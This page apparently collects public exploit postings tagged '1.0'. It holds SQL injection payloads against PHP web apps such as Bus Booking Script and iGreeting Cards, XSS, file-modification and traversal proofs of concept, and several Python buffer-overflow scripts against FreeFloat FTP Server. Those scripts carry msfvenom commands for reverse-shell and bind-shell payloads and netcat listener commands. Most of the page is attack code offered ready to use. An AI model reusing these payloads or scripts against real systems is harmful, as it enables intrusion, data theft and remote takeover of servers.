Showing results for tag '1.0'.
14 results found

  1. Hacking

    <!--
    # # # # # #
    # Exploit Title: Bus Booking Script 1.0 - SQL Injection
    # Dork: N/A
    # Date: 13.12.2017
    # Vendor Homepage: http://www.phpautoclassifiedscript.com/
    # Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: CVE-2017-17645
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    -->
    <html>
    <body>
    <form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self">
    <input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari">
    <input name="logbut" id="logbut" type="submit">
    </form>
    </body>
    </html>
  2.

    # # # # # #
    # Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection
    # Dork: N/A
    # Date: 25.08.2017
    # Vendor Homepage: https://www.weborange.eu/
    # Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail
    # Demo: http://www.weborange.eu/demo/index.php/bargain-product
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL]
    # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL]
    #
    # 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31
    #
    # Etc..
    # # # # # #
  3. Hacking

    # # # # # #
    # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download
    # Dork: N/A
    # Date: 28.08.2017
    # Vendor Homepage: http://nelliwinne.net/
    # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022
    # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The security obligation allows an attacker to download arbitrary files..
    #
    # Vulnerable Source:
    #
    # .............
    # <?php
    # $file = base64_decode($_GET['id']);
    #
    # if (file_exists($file)) {
    #     header('Content-Description: File Transfer');
    #     header('Content-Type: application/octet-stream');
    #     header('Content-Disposition: attachment; filename="'.basename($file).'"');
    #     header('Expires: 0');
    #     header('Cache-Control: must-revalidate');
    #     header('Pragma: public');
    #     header('Content-Length: ' . filesize($file));
    #     readfile($file);
    #     exit;
    # }
    # ?>
    # .............
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64]
    #
    # Etc...
    # # # # # #
  4. Hacking

    # # # # # #
    # Exploit Title: FineCMS 1.0 Multiple Vulnerabilities
    # Dork: N/A
    # Date: 29.08.2017
    # Vendor Homepage : http://mvc.net.pl/
    # Software Link: https://github.com/andrzuk/FineCMS
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: sohaip-hackerDZ
    # Author Web: http://www.hacker-ar.com
    # Author Social: @sohaip_hackerDZ
    # # # # #

    Reflected XSS in get_image.php

    Technical Description: in file /application/lib/ajax/get_image.php the $_POST['id'], $_POST['name'] and $_GET['folder'] parameters are used without being validated, sanitised or output-encoded.

    Proof of Concept (PoC):
    http://your_finecms/application/lib/ajax/get_image.php?folder=1
    POST: id=1"><script>alert(1)</script>&name=1

    Arbitrary File Modify

    Technical Description: the base function for modifying the template can also modify the filename; this leads to arbitrary file modification, which could allow an attacker to get a shell. File /application/core/controller/template.php line 50-53 follows function save() in file /application/core/model/template.php line 26-48: if the file exists, we can modify it without any limit. Interestingly, there are two more vulnerabilities in the same function in different files: file /application/core/model/style.php line 26-48 and file /application/core/model/script.php line 26-48.

    Proof of Concept (PoC):
    http://your_finecms/index.php?route=template
    http://your_finecms/index.php?route=style
    http://your_finecms/index.php?route=script
    POST: contents=<?php phpinfo();?>&filename={any exist filename}&savabutton=Zapisz

    Authenticated SQL injection

    All of FineCMS uses PDO to connect to the MySQL server, so all of the data goes into the database without being validated, sanitised or output-encoded. But in application/core/controller/excludes.php the website author uses mysqli to connect to the MySQL server; this leads to SQL injection, which could allow an attacker to use a payload to get data from the database.

    Technical Description: in file application/core/controller/excludes.php line 75, the visitor_ip is inserted into the database without being validated, sanitised or output-encoded. In file /stat/get_stat_data.php line 30 the SQL is injected into sql_query and executed.

    Proof of Concept (PoC):
    http://your_finecms/index.php?route=excludes&action=add
    POST: visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz
    Then view http://your_finecms/stat/get_stat_data.php; we can notice the website loading being delayed by the sleep.

    Stored XSS in images.php

    FineCMS allows the admin to upload an image into the gallery and shows the image data in pages, but some of the data is output into pages without being validated, sanitised or output-encoded. This allows an attacker Cross Site Scripting.

    Technical Description: when we upload the file, file application/core/controller/images.php line 87 follows the function add() in file application/core/model/images.php line 78; if the filetype starts with "image", the filetype is inserted into the database. When we view the detail of the image, file application/lib/generators/view.php line 106 outputs some of it into pages.

    Proof of Concept (PoC): view http://your_finecms/index.php?route=images&action=add, upload a picture, modify the picture's filetype, and view the detail of the picture. Because the vulnerability is also in the edit detail page, you can also use edit to insert script code into pages: http://your_finecms/index.php?route=images&action=edit&id=15, then view the detail of the picture.

    Stored XSS in visitors.php

    FineCMS stores the visited URL of all visitors, but in the detail of the log they are output into pages without being validated, sanitised or output-encoded. This allows an attacker Cross Site Scripting.

    Technical Description: just like the last vulnerability.

    Proof of Concept (PoC): visit any page with JS script code, such as index.php?route=images&action=view&id=14'"><script>alert(1)</script>
  6. Hacking

    # # # # # #
    # Exploit Title: iGreeting Cards 1.0 - SQL Injection
    # Dork: N/A
    # Date: 04.09.2017
    # Vendor Homepage: http://coryapp.com/
    # Software Link: http://coryapp.com/?product&index
    # Demo: http://coryapp.com/demo/greetingcards/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/index.php?index&search&k=[SQL]
    #
    # eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+-
    #
    # http://localhost/[PATH]/index.php?index&index&p=[SQL]
    #
    # http://localhost/[PATH]/index.php?category&index&id=[SQL]
    #
    # Etc..
    # # # # # #
  7. Hacking

    # # # # # #
    # Exploit Title: The Car Project 1.0 - SQL Injection
    # Dork: N/A
    # Date: 05.09.2017
    # Vendor Homepage: http://thecarproject.org/
    # Software Link: http://thecarproject.org/thecarproject.zip
    # Demo: http://www.thecarproject.org/cp
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Vulnerable Source:
    #
    # <?php
    # .............
    # if(isset($_GET['car_id'])) {
    #     $motor_id = $_GET['car_id'];
    #     if (!empty($_GET['man_id'])){
    #         $manufacturer_id = $_GET['man_id'];
    #     }
    # .............
    # ?>
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/info.php?car_id=[SQL]
    #
    # -5+/*!11122uNiOn*/(/*!11122sELect*/0x283129,0x283229,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,(44),0x28343529,0x28343629,0x28343729,0x28343829,0x28343929)
    #
    # Etc..
    # # # # # #
  8. Hacking

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # Exploit Title: FreeFloat FTP Server RENAME Command Buffer Overflow Exploit
    # Date: 29/10/2016
    # Exploit Author: Eagleblack
    # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
    # Version: 1.00
    # Tested on: Windows XP Profesional SP3 Spanish version x86
    # CVE : N/A
    # Description: FreeFloat FTP server allows login as root without a user and password. This vulnerability allows an attacker to log in and send a
    # long chain of characters that overflows the buffer; when the attacker knows the exact number that overwrites the EIP register
    # he can take possession of the application and send malicious code (payload) to the ESP stack pointer, which allows obtaining
    # remote code execution on the system that is running the FTP server, in this case Windows XP.

    import socket

    ret = "\x5B\x96\xDC\x77"  # ADVAPI32.dll: this dll has a jump to the ESP stack pointer

    # Metasploit shellcode:
    # msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
    shellcode = ("...")  # msfvenom-generated byte string omitted

    buffer = '\x41' * 245 + ret + '\x90' * 30 + shellcode  # EIP overwritten at offset 245
    print "Sending Buffer"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # open socket
    connect = s.connect(('192.168.1.13', 21))  # IP address and port (21) of the target
    s.recv(1024)  # FTP banner
    s.send('USER \r\n')  # Sending USER (null user)
    s.recv(1024)
    s.send('PASS \r\n')  # Sending password (null password)
    s.recv(1024)
    s.send('RENAME' + buffer + '\r\n')
    s.close()
  9. Hacking

    #!/usr/bin/env python
    #-*- coding: utf-8 -*-
    # Exploit Title: FreeFloat FTP Server HOST Command Buffer Overflow Exploit
    # Date: 30/10/2016
    # Exploit Author: Cybernetic
    # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
    # Version: 1.00
    # Tested on: Windows XP Profesional SP3 ESP x86
    # CVE : N/A

    import socket, os, sys

    ret = "\xC7\x31\x6B\x7E"  # Shell32.dll 7E6B31C7

    # Metasploit Shellcode
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c
    # nc -lvp 443
    # Send exploit
    shellcode = ("...")  # msfvenom-generated byte string omitted

    shell = '\x90' * 30 + shellcode
    buffer = '\x41' * 247 + ret + shell + '\x43' * (696 - len(shell))
    print "Sending Buffer"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect(('10.10.10.10', 21))
    s.recv(1024)
    s.send('USER test \r\n')
    s.recv(1024)
    s.send('PASS test \r\n')
    s.recv(1024)
    s.send('HOST' + buffer + '\r\n')
    s.close()
    print "Attack Buffer Overflow Successfully Executed"
  10. Hacking

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import socket

    #Exploit Title: FreeFloat FTP Server Buffer Overflow RMD command
    #Date: 29 October 2016
    #Exploit Author: Karri93
    #Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
    #Version: 1.0
    #Tested on: Windows XP Profesional SP3 Spanish x86

    #Shellcode Metasploit:
    #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c
    #nc -lvp 443
    ret = "\x2F\x1D\xF1\x77"  # GDI32.dll
    shellcode = ("...")  # msfvenom-generated byte string omitted

    buffer = '\x90' * 30 + shellcode
    buffer1 = '\x41' * 248 + ret + buffer + '\x43' * (696 - len(buffer))
    print "Sending..."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect(('192.168.1.150', 21))
    s.recv(1024)
    s.send('USER free\r\n')
    s.recv(1024)
    s.send('PASS free\r\n')
    s.recv(1024)
    s.send('RMD' + buffer1 + '\r\n')
    s.close()
  11. Hacking

    #!/usr/bin/env python
    #-*- coding: utf-8 -*-
    # Exploit Title: FreeFloat FTP Server BoF ABOR Command
    # Date: 29/10/2016
    # Exploit Author: Ger
    # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
    # Version: 1.0
    # Tested on: Windows XP Profesional V. 2002 Service Pack 3
    # CVE : n/a

    import socket

    #shellcode with metasploit
    #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.74.132 LPORT=443 -b '\x00\x0d\x0a' -f c
    #nc -lvp 443
    #send the exploit
    ret = '\x73\x18\x6E\x74'  # MSCTF.dll
    shellcode = ("...")  # msfvenom-generated byte string omitted

    buffer = '\x90' * 20 + shellcode
    buffer1 = '\x41' * 247 + ret + buffer + '\x43' * (696 - len(buffer))
    print "Sending Buffer"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect(('192.168.74.133', 21))
    s.recv(1024)
    s.send('USER anonymous\r\n')
    s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.recv(1024)
    s.send('ABOR' + buffer1 + '\r\n')
    s.close()
  12. Hacking

    import socket
    import sys
    import os

    print '''
    ##############################################
    # Created: ScrR1pTK1dd13                     #
    # Name: Greg Priest                          #
    # Mail: [email protected]                    #
    ##############################################
    # Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit
    # Date: 2016.11.02
    # Exploit Author: Greg Priest
    # Version: FreefloatFTPserver1.0
    # Tested on: Windows7 x64 HUN/ENG Professional
    '''

    ip = raw_input("Target ip: ")
    port = 21
    overflow = 'A' * 247
    eip = '\xF4\xAF\xEA\x75' + '\x90' * 10
    #shellcode calc.exe
    shellcode = ("...")  # calc.exe shellcode byte string omitted
    remotecode = overflow + eip + shellcode + '\r\n'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect((ip, port))
    s.recv(1024)
    s.send('USER anonymous\r\n')
    s.recv(1024)
    s.send('PASSW [email protected]\r\n')
    s.recv(1024)
    print '''
    Successfull Exploitation!
    '''
    message = 'dir ' + remotecode
    s.send(message)
    s.recv(1024)
    s.close()
  13.

    #!/usr/bin/env python
    #-*- coding: utf-8 -*-
    # Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command
    # Date: 04/11/2016
    # Exploit Author: Luis Noriega
    # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
    # Version: 1.0
    # Tested on: Windows XP Profesional V. 5.1 Service Pack 3
    # CVE : n/a

    import socket

    # shellcode with metasploit:
    # msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
    # nc 192.168.1.150 4444
    ret = "\x2F\x1D\xF1\x77"  # GDI32.dll
    shellcode = ("...")  # msfvenom-generated byte string omitted

    buffer = '\x90' * 30 + shellcode
    buffer1 = '\x4C' * 242 + ret + buffer + '\x41' * (749 - len(buffer))
    print "Sending Buffer"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect(('192.168.1.150', 21))
    s.recv(1024)
    s.send('USER anonymous\r\n')
    s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.recv(1024)
    s.send('SITE ZONE' + buffer1 + '\r\n')
    s.close()
  14. Hacking

    # Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal
    # Date: 2017-03-19
    # Exploit Author: malwrforensics
    # Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download
    # Version: 1.0
    # Tested on: Windows

    Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server.

    Example:
    Assuming the root folder is c:\<app_folder>\<html_folder>
    http://<server>/..%5c..%5c/windows/win.ini